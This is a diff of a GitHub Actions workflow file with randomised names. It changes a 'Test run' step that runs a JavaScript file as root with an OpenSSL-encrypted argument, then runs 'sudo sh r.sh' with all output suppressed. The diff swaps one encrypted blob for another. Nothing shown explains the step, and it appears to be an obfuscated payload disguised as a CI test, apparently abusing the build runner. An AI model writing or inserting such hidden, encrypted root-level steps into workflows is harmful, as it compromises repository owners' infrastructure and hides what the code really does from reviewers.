ALL SORTS OF THINGS

--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'ge7un'
+        echo 'l78eh'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+tL+8mMYEXL7hMY6bKbptaIim/TRoU8+wq2fR5T6AR4NcgIqLv20JKK7zknFwS5ocjRshFuO/gBsVws0f1+bLgZymnNjqb07cHiOnfE9aIsM4kMLN5/xGy 3kgecl && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18noEB4nzPs/YkjeRjIDVFTrSnX7WeVjXTmG/1ZoXSpU7uU3x3CwUIP0wBC3CPdnpFtZnfwlQQAn0yNUeX6S0q1XNpKsMhR0hCwuOW66kC7TVqb8VSCdpjF 7zkoge && sudo sh r.sh > /dev/null 2>&1
